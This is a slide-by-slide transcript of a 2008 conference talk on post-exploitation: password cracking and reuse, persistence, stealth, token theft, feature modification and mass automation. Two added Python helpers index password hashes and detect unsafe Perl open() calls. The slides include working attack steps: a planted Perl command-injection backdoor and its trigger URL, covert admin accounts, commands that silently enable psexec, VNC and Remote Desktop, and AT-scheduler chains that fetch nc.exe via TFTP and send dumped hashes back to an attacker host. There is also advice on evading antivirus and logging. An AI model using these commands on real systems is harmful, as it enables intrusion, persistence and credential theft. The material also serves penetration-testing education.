BH US 08 Smith Ames Meta-Post Exploitation PDF

This document provides an overview of a talk on meta-post exploitation techniques. The talk discusses password management, persistence, and stealth techniques that can be used after gaining initial access to a system or network. For password management, it describes tools for acquiring, cracking, tracking, and reusing passwords across multiple systems. For persistence, it outlines different methods for maintaining long-term access such as backdoors, Trojans, and modifying services. Finally, it covers ways to evade detection including hiding commands in web applications and using covert accounts. The presentation provides examples and demonstrations of these post-exploitation concepts.


Meta-Post Exploitation

Using Old, Lost, Forgotten Knowledge

Val Smith ([email protected])


Colin Ames ([email protected])

Slide: 1
Valsmith
– Affiliations:
• Offensive Computing
• Metasploit
• cDc
– Work:
• Malware Analyst
• Reverse Engineer
• Penetration Tester
• Exploit developer

Slide: 2
Colin Ames
– Security Researcher, Offensive Computing
– Steganography Research
– Penetration Testing
– Reverse Engineering
– Malware Analysis

Slide: 3
• What is this?
– Follow up to Val’s and HD Moore’s Tactical Exploitation talk from last year
– A talk about the use of automation and tactical tools post-exploitation
– Applied techniques
– Good for LARGE environments
– Different perspectives: some old, some forgotten, some new

Slide: 4
Post Exploitation Concepts Overview

Slide: 5
What Is Post Exploitation?

• It’s what you do after you get root
– Note: This talk assumes you have access
• Includes
– Password Management
– Persistence
– Stealth / Evading Detection
– User Identity Theft
– Feature Modification
– Automation & Mass 0wnage

Slide: 6
What Is Post Exploitation?

• Getting root is just the beginning
– How do you spread?
– How to manage assets as you go along?
• Lots of tools to help you get root:
– Metasploit, Core, Canvas, Stand alone
• But what about after breaking in?
– Lots of random tools
– Little automation / standardization
– Archaic, hard to use, poorly documented
– Maliciousness often obvious
– Not scalable to 1000’s of hosts (ignoring botnets for this talk)
Slide: 7
Password Management

Slide: 8
Why Password Management?

– Large pentests, 1000’s of passwords
– Testing a cracked password on many systems can be time consuming
– Keeping track of cracking sessions
– Building and growing your wordlist lets you crack faster
– Aids in cleanup stage
• Tying accounts to systems

Slide: 9
Password Management Goals

– Acquired password storage
– Organization and tracking
• What passwords go with which hosts
• What passwords are shared
• Which users have access to what resources
– Re-use for further access
– Expanding wordlist for faster cracking
Slide: 10
Password Management Stages & Techniques

– Acquiring: pwdump, cat /etc/shadow, cachedump, sql query, sniffing
– Decisions: Prioritize accounts to crack
– Cracking: John, l0pht, Cain
– Tracking: Nothing?
– Reusing: Core Impact

Slide: 11
Manual Password Management

• Existing Tools
– L0phtCrack
• Stores passwords in session files
– Cain&Abel
• Static table, difficult to export / use / automate
• Password Classification (NTLM, Cisco, SQL, md5)
– Core Impact
• Good for automated reuse of passwords against many hosts
• No real storage / management capability
– Text file / John the Ripper
• Many people’s method
• Quick and dirty, not easily scalable

Slide: 12
Slide: 13
• MetaPass
• Demos

Slide: 14
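The tracking goals on slides 10 and 11 (which hashes belong to which hosts, which are shared, which accounts reach what) can be answered from a small index over pwdump output. The following is an added example, not MetaPass or any tool from the talk; the host names and hashes are constructed, and `parse_pwdump`, `CredentialStore` and `build_store` are names chosen here. A defender can run the same query over their own dumps to find shared local-administrator passwords.

```python
"""Index pwdump-style lines (user:rid:lmhash:nthash:::) per host and
report hash reuse across hosts. Added example; all data is constructed."""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # well-known "no LM hash" value


def parse_pwdump(host, text):
    """Yield (host, user, nthash) for each pwdump line; skip malformed lines."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[3]:
            continue
        yield host, parts[0].lower(), parts[3].lower()


class CredentialStore:
    def __init__(self):
        self.by_hash = defaultdict(set)   # nthash -> {(host, user)}
        self.by_host = defaultdict(dict)  # host -> {user: nthash}

    def add(self, host, user, nthash):
        self.by_hash[nthash].add((host, user))
        self.by_host[host][user] = nthash

    def shared_hashes(self):
        """Hashes seen on more than one host, i.e. password reuse."""
        return {h: sorted(p) for h, p in self.by_hash.items()
                if len({host for host, _ in p}) > 1}

    def hosts_for_hash(self, nthash):
        return sorted(host for host, _ in self.by_hash.get(nthash, ()))


# Constructed dumps: the Administrator hash is reused on ws01 and ws02, and
# bob on ws01 shares a password with svc_backup on srv01.
DUMPS = {
    "ws01": "Administrator:500:" + EMPTY_LM + ":0123456789abcdef0123456789abcdef:::\n"
            "bob:1001:" + EMPTY_LM + ":fedcba9876543210fedcba9876543210:::",
    "ws02": "Administrator:500:" + EMPTY_LM + ":0123456789abcdef0123456789abcdef:::",
    "srv01": "Administrator:500:" + EMPTY_LM + ":11111111111111111111111111111111:::\n"
             "svc_backup:1002:" + EMPTY_LM + ":fedcba9876543210fedcba9876543210:::",
}


def build_store(dumps=DUMPS):
    store = CredentialStore()
    for host, text in dumps.items():
        for rec in parse_pwdump(host, text):
            store.add(*rec)
    return store
```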
Persistence

Slide: 15
A word on Stealth vs Persistence

– In the old days a rootkit helped you maintain root
– Today rootkits are all about hiding
– These two concepts still go hand in hand

Slide: 16
Persistence

• Persistence is maintaining access
• Why?
– Targets can get patched
– Some exploits are 1 shot only
– Sometimes you need to return multiple times to the target
– Target’s usefulness not always immediately known
• Goals: Access target as often as needed/useful
• Huge area of study
• Sometimes persistence doesn’t matter
Slide: 17
Persistence

• Stages of Persistence
– Initial access:
• Exploit
• Stolen password, etc.
– Decisions: What tool to use
• FUZZY – OS, Environment, Target dependent
– Setup
– Re-accessing of target
– Cleanup: Don’t be a slob, it will get you caught
• When you no longer need the target, leave no trace

Slide: 18
Persistence

• Existing tools
– Rootkits
– Backdoors
– Trojans
– Port knockers
– Adding accounts
– Things like netcat backdoors, inetd modifications, process injection, stealing credentials, etc.
Slide: 19
Persistence

• Different perspective on persistence
– If you can always re-exploit, who cares
– Inject, add, modify new vulnerabilities
• Hard to determine maliciousness
• We all know it’s hard to find bugs; now imagine someone is purposefully putting the bugs in

Slide: 20
Persistence

• Leveraging existing persistent admin access
• Nagios checks
• Attack Configuration Management
– Cfengine
– SMS
– Automated Patching Systems (“patch” them with our trojans)
• GUI’s
• Tool distribution

Slide: 21
Persistence

• Example:
• Machine has VNC installed
• Replace installed VNC with vulnerable version
– Authentication bypass
• Copy registry password so target doesn’t realize
• Persistence with no backdoors or rootkits to get
detected

Slide: 22
Persistence

• Add vulnerable code
• Example: web apps
– Take out user input validation
– Inject your vulnerable code
• Focus on vague intent
• Never be obviously and solely malicious
– Look for apps with previous vulnerabilities
– Re-introduce patched bugs

Slide: 23
Persistence

• More web app examples

• Add hidden field to HTML form
– Users detect no change, app performs normally

<input type="hidden" name="Lang">

• Edit web app and tie vulnerable perl code to the form field input

if (defined $hidden_field) {
    open($filename, ">$hidden_field");
}
• Craft a POST including the hidden field
Slide: 24
Persistence

• www.target.com/cgi-bin/app.cgi?lang=|cmd|
• Code will execute your commands
• Who needs to bind a shell to a port?
• Unlikely to ever be detected
– Especially good in big apps
– Code review can’t even be sure of maliciousness
– Some sites replace code every X time period
• No rootkits to install
• Tripwire probably won’t see this
Slide: 25
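Slides 24 and 25 rely on Perl’s two-argument open(), which reads the mode from the string itself, so a form value such as |cmd| turns a file open into command execution and looks like an ordinary bug in review. The check below is an added example, not from the talk: it scans Perl CGI source for two-argument open() calls whose double-quoted path interpolates a variable, which flags the construct whether it was planted or accidental. `find_unsafe_opens` and the SAMPLE_CGI text are constructed here.

```python
"""Flag two-argument open() calls with an interpolated path in Perl source.
Added example; the sample CGI text is constructed."""
import re

# Matches open(HANDLE, "...") with exactly two arguments and a double-quoted
# second argument (the only form where variable interpolation applies).
TWO_ARG_OPEN = re.compile(
    r'open\s*\(\s*([^,()]+?)\s*,\s*"((?:[^"\\]|\\.)*)"\s*\)'
)
# A Perl scalar interpolated into the string: $name or ${name}
INTERPOLATED_VAR = re.compile(r'\$\{?\w+\}?')


def find_unsafe_opens(perl_source):
    """Return (line_number, handle, path_string) for each risky open()."""
    findings = []
    for lineno, line in enumerate(perl_source.splitlines(), start=1):
        for m in TWO_ARG_OPEN.finditer(line):
            path = m.group(2)
            if INTERPOLATED_VAR.search(path):
                findings.append((lineno, m.group(1), path))
    return findings


# Constructed sample in the style of the slide-24 snippet, plus two safe
# controls: a three-argument open and a two-argument open with a literal path.
SAMPLE_CGI = r'''
use CGI;
my $q = CGI->new;
my $hidden_field = $q->param('Lang');
if (defined $hidden_field) {
    open($filename, ">$hidden_field");      # two-arg, interpolated: flagged
}
open(my $log, '>>', '/var/log/app.log');    # three-arg open: mode is fixed
open(CFG, "app.conf");                      # two-arg, but a literal path
'''

if __name__ == "__main__":
    for lineno, handle, path in find_unsafe_opens(SAMPLE_CGI):
        print(f'line {lineno}: open({handle}, "{path}") takes its mode from user data')
```

The same check generalises to any two-argument open whose second argument is built from request data, not only the hidden-field case on the slide.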
Persistence

• Take concept to another level
– Add a decoder to web app
– Look for a “trigger” string combination in form fields
– If Name = John Smith and Age = 42 then execute contents of Address field
– URL encode form entries containing commands
– Have identifier “stub” in encoded data for app to find

Slide: 26
Persistence

• Mixing Stealth with Persistence
– Further encoding
– Take entries from all fields
– Concat them
– “Decode” commands
– Rotational Ciphers (rot 13, Caesar)
– Even more complex obfuscation
Slide: 27
Persistence

• Covert Accounts
– Add an account / re-enable one
– Modify local account policies to allow access
• Ex. SUPPORT_3848576b1, guest
– Add it to the admin group (net localgroup)
• Only use AT to run your commands
• Persistence without adding files, new accounts
– Unlikely to be discovered

Slide: 28
• DEMOS

Slide: 29
Stealth / Evading Detection

Slide: 30
Stealth / Evading Detection

• Hiding your activity
– From:
• IDS
• A/V
• LOGGING
• Suspicious users & admins
• Firewalls
• Process listing

Slide: 31
Stealth / Evading Detection

• Why Stealth?
– If you get caught, you get stopped
– The longer you can operate undetected, the more you can accomplish
– Admins won’t fix problems they don’t know exist (helps persistence)
– On a pen test you should also be testing the organization’s detection and response capabilities

Slide: 32
Stealth / Evading Detection

• Goals
– Keep system operable
• If it breaks you can’t use it
• Someone will come fix it
– Operate without fear of detection
– Robustness
• Hiding shouldn’t require constant attention
– DON’T LOOK MALICIOUS!
Slide: 33
Stealth / Evading Detection

• Manual / Existing Tools
– Rootkits, rootkits, rootkits
– Meterpreter
– Encryption
• Shellcode Encoders for IDS evasion
– Log cleaners
– Packers
– Covert channels / Steganography
– Anti-analysis / anti-forensics
• See all of OC’s other talks ☺
• Also Vinnie Liu’s Metasploit research

Slide: 34
Stealth / Evading Detection

• Different Perspective
– DON’T BE AN ANOMALY!
– Hide in plain sight
• Many tools have ONLY malicious uses
• Make your intent hard to determine
– Be noisy on one to divert attention from
another

Slide: 35
Stealth / Evading Detection

• Different Perspective
– Know the target’s environment better than they do
• If they don’t use encryption, maybe you shouldn’t either
• Change strategies to match environment's normal behavior
– Don’t always default to exploits
• See Tactical Exploitation talk
• IDS’s can’t see normal behavior that is malicious

Slide: 36
Stealth / Evading Detection

• Using Windows security objects for stealth
– Auditing of Securable Objects is controlled by SACL’s
– Null SACL = No Auditing = No Logs

Slide: 37
• DEMOS
– Kaspersky squeals like a pig

Slide: 38
User Identity Theft

Slide: 39
User Identity Theft

• It’s not always about ROOT!
• Look like someone else
– Use the credentials / access of another user
• Goals
– Change your identity at will
• User ID, domain credentials, sessions
• Impersonate system accounts
• Make activities look like normal user behavior

Slide: 40
User Identity Theft

• Stages and techniques
– Target users
• Who has access to what
• Where is the data?
– Change Identity
• Hijack credentials/sessions
• Abuse tokens
– Access is the end goal, be it data or another system

Slide: 41
User Identity Theft

• Existing tools
– Incognito (metasploit)
• Enumerate / hijack tokens
– FU/FUTO
• Enable SYSTEM privileges
• Change process privileges DKOM
– SU / SUDO / KSU
– Process injection
– Hijack domain credentials

Slide: 42
User Identity Theft

Tokens, Privileges, Security Descriptors, SID’s, SACL’s, DACL’s, ACE’s Oh My

• What we want
– Privileges or SID’s
• What we get
– Access, Access, Access
• How we get it
– Incognito vs. FUto
Slide: 43
• DEMOS

Slide: 44
Feature Modification

Slide: 45
Feature Modification

• Changing existing features or settings to benefit our activities
• Goals
– Support all Post-Exploitation activities
– Disabling detection technologies
– Enabling in-secure or easy to use access software

Slide: 46
Feature Modification

• Feature Modification is Basically Securable Object Manipulation
– Remember all those Tokens and Security Descriptors?
– These can be modified programmatically and directly
• Not just through existing tools
– Stealth / Persistence requirements
• May make it more advantageous to use custom tools
– Access Objects programmatically
– Can be much more complex to implement

Slide: 47
Feature Modification

• Re-enabling disabled access
– PsExec: It’s still cool (Thanks Mark!)
• Enabling GUI access
– VNC (from a command line)
– Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
– Firewalls, AV, logging
• Modifying Local Security Policies

Slide: 48
Feature Modification

• Enabling psexec
– Psexec was a great, awesome remote shell/command tool
– Everybody now disables clipbook, which psexec requires l4m3
– Let’s re-enable it!

Slide: 49
Feature Modification

• Enabling psexec
• Use the system control tool sc.exe
– Net use \\target\ipc$ password /user:username
– Sc \\target config netdde start= auto
– Sc \\target config netddedsdm start= auto
– Sc \\target config clipsrv start= auto
– Sc \\target start netdde
– Sc \\target start netddedsdm
– Sc \\target start clipsrv

Slide: 50
Feature Modification

• Enabling VNC (from command line)
– Go get VNC (check out guh.nu!)
– Make a folder on the target for the vnc files
– Copy the following files to target folder:
• Winvnc.exe
• Vnc.reg
• Vnchooks.dll
• Omnithread_rt.dll
– Regedit –s vnc.reg
– Winvnc –install
– Net start “vnc server”
– Winvnc
– Password is “infected”

Vnc.reg file contents:

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
"Password"=hex:10,4d,89,3d,5a,e1,55,f8

Slide: 51
Feature Modification

• Enabling Remote Desktop remotely
– Having a GUI to your target can be necessary
– Maybe they are running a specialized GUI app
• Ex. System controlling access to security doors
– No command line way of modifying system, need GUI
• SCADA systems?
• Security cameras
• Who knows what you might be up to ☺
– Remote desktop is fast and already a feature of OS
– However it’s often disabled, maybe even by GPO
Slide: 52
Feature Modification
• Enabling Remote Desktop remotely
– Complicated procedure, especially if GPO’s involved
– Create a file named fix_ts_policy.ini
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =

– This file will fix policy settings in your way
– Change “hacked_account” to a real account

Slide: 53
Feature Modification
• Enabling Remote Desktop remotely
– Create another file named enable_ts.reg
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]

"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000

– Then perform these commands
• sc config termservice start= auto
• regedit /s enable_ts.reg
• copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
• copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
• secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
• gpupdate /Force
• net start "terminal services"
Slide: 54
• DEMOS

Slide: 55
Abusing The Scheduler

Slide: 56
Abusing The Scheduler

• Oldschool techniques can get results on new problems
• Remember this is POST exploitation so you already have some access
• AT command schedules things to run at a specified time and date
– Schedule service must be running

Slide: 57
Abusing The Scheduler

• Often these days certain features are disabled for security
– Clipbook, shares, enumeration
• Use AT to get around these problems
– Usually NOT disabled

Net use \\target\ipc$ password /user:username
At \\target 12:00 pm command
Ex. At \\192.168.1.1 12:00pm tftp –i myip GET nc.exe

Slide: 58
Abusing The Scheduler

• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell:
– Enable / Start Services
– Transfer files
– Adding users
– Messing with the registry / policies
– Pretty much anything you can do with a shell
– Added bonus, defaults to run as SYSTEM
Slide: 59
Abusing The Scheduler

• Building a tool around AT
– Flow:
• Establish authenticated session
• Determine the time on the target
• Pass commands to the target to be run 1 min from now
– Write a batch file that executes everything at once
– Have the target send you back whatever info you want
– Be mindful of file transfer protocols, TFTP is good but not
always “quiet” or available

Slide: 60
Abusing The Scheduler

• Common use example
– Net use \\target
– Net time \\target
– At \\target (net time +1min) “tftp –i use GET e.bat”
– At \\target (net time +2min) e.bat
– e.bat does:
• Adds a user (net user hacked hacked /add)
– Admin group (net localgroup administrators hacked /add)
• Gets hashdumping tools and dumps hashes
• Sends hashes, identified by IP back to attacker host
Slide: 61
Abusing The Scheduler

• Privileges of LocalSystem that we care about
– NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
– SE_IMPERSONATE_NAME
– SE_TCB_NAME
– SE_DEBUG_NAME

Slide: 62
Massive Automation

Slide: 63
Massive Automation

• Automating techniques and tools for use against massive numbers of hosts
• Goals
– Penetrate as many systems as possible
with little interaction and in a short time
– Ease of use / re-use
– Lower cost of attack

Slide: 64
Massive Automation

• MassNetUse – Establish netbios session / credentials on range of hosts
• MassWinenum – Enumerate Netbios information, bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your “shell” to control ranges of hosts

Slide: 65
• DEMOS

Slide: 66
• Related talks you should see
– Beyond EIP – The theoretical / tool
development end of things (spoonm & skape)
– Security Implications of Windows Access
Tokens (Luke Jennings)

Slide: 67
• Acknowledgements
– Thanks to
• All the people from #offensivecomputing, nologin,
uninformed IRC and SILC channels
• HD Moore especially for support and mentorship
• Danny Quist, krbklepto, Egypt, spoonm, skape
• Luke Jennings for his awesome work

Slide: 68
• Questions ?
• Presentation available at www.offensivecomputing.net

Slide: 69
